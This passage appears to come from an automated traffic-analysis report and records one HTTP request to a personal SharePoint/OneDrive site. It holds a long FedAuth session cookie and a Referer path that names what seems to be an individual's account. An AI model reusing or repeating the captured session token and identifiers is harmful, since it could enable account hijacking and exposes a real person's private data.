XMkxYOUZnSXozMXp0bHZsSERpM2VrKzM1dXQ0amJNUUVCdG90c3ZTQ0JKc216VWVaQVRqZXZnazdlZExQbjlJdkFYZGxCNU5KRjBqUjlxRnN4bFM3cUM3TnNNNWtOajc4MU1kU3k1WHpFMDB5ajFTZnAwQjZEK2JkTlUzR1JKdTRFMmRUanJhMlIza3pQa2J6bHhweGZUbG1taEVKVkE1SlloSnR0MURqNUFyRFVLczRsV1puaXpiNVNseGwvbEhQOGh1d2V5OGlXWlNMS1lrRVF1YzYyZGpnOHhzek5yR0tYZlcwdFlOelVXRCtacVRCL3ZFaUFvYXFoSWZYbXVlaXV2aXFXVjJJYmxjVThoUmdiRS9ObTVIUEF3K2FmdDRsSHFnaVJtU1dYczlCOWJpaWJDclpQZHV5aE5SM1ArOC9ndUFzWFkzOE1NdWtmQ0lDd1BQWFE9PTwvU1A+; FeatureOverrides_experiments=[] |
Source: global traffic | HTTP traffic detected: GET /_layouts/15/odspserviceworkerproxy.aspx?swManifestName=spserviceworker&debug=false&bypass=false&navigationPreloadHeaderValue=%7B%22supportsFeatures%22%3A%5B1855%2C61313%5D%7D&dataHost=Nucleus&applications=%5B%7B%22id%22%3A%22STS%22%2C%22swPrefetchManifestName%22%3A%22stsserviceworkerprefetch%22%7D%2C%7B%22id%22%3A%22SPHome%22%7D%2C%7B%22id%22%3A%22SitePages%22%7D%2C%7B%22id%22%3A%22Embed%22%7D%2C%7B%22id%22%3A%22CreateGroup%22%7D%2C%7B%22id%22%3A%22SingleWebPart%22%7D%2C%7B%22id%22%3A%22VivaHome%22%7D%2C%7B%22id%22%3A%22BrokerLogon%22%7D%2C%7B%22id%22%3A%22Clipchamp%22%7D%2C%7B%22id%22%3A%22MeeBridge%22%7D%2C%7B%22id%22%3A%22SPStart%22%7D%2C%7B%22id%22%3A%22Agreements%22%7D%5D&list=v2&prefetchListData=true&defaultBrotli=true&authenticateFast=true&inlineAuth=v2&wwData=true&prefetchFilebrowserPageInTeams=true&FUIV9Flights=[-83099905,3]&spStartApplicationWebBundle=true&enableIntegrities=true&spartanOneDriveWireframe=true&streamViewServerLoad=true&streamInlineScript=true&siteConfigRace=true&listhandler=v2 HTTP/1.1Host: organismekina8at-my.sharepoint.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://organismekina8at-my.sharepoint.com/personal/mariejoelle_tremblay_kina8at_ca/_layouts/15/onedrive.aspx?id=%2Fpersonal%2Fmariejoelle%5Ftremblay%5Fkina8at%5Fca%2FDocuments%2FPerso%2FOrganisme%20Kina8a&ga=1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: FedAuth=77u/PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48U1A+VjE0LDBoLmZ8bWVtYmVyc2hpcHx1cm4lM2FzcG8lM2Fhbm9uIzRlODU4MDg3YWY2NGE3NWI3YmJmZTQ5YzMyMmRmNGQyNTEzZGY4ZjZiMDgyZmY1Mzg1MWI2NjllYTgyMzU5YmYsMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jNGU4NTgwODdhZjY0YTc1YjdiYmZlNDljMzIyZGY0ZDI1MTNkZjhmNmIwODJmZjUzODUxYjY2OWVhODIzNTliZiwxMzM4MTI1MDk4NzAwMDAwMDAsMCwxMzM4MTMzNzA4NzEwMjE2NTcsMC4wLjAuMCwyNTgsMTk3YmE3MjYtODdjYi00NzNlLWEyYTUtZDY4MWUwOWU1MTdlLCwsODAyMjc3YTEtYjBlNC03MDAwLTYzNTgtZDdmZjE2MjE2NzIzLDgwMjI3N2ExLWIwZTQtNzAwMC02MzU4LWQ3ZmYxNjIxNjcyMyx2SXFsdXViUmdFU3RZTGtBaWV3ZzVnLDAsMCwwLCwsLDI2NTA0Njc3NDM5OTk5OTk5OTksMCwsLCwsLCwwLCwxOTIyMzcsdVhlaFFKUGxlVmpOQ2Jha1VoR0Q2SXlGUVFrLGtfeFd2SF82b0huTTVLdW1HUE91U1hTLXpIQSxXMkxYOUZnSXozMXp0bHZsSERpM2VrKzM1dXQ0amJNUUVCdG90c3ZTQ0JKc216VWVaQVRqZXZnazdlZExQbjlJdkFYZGxCNU5KRjB |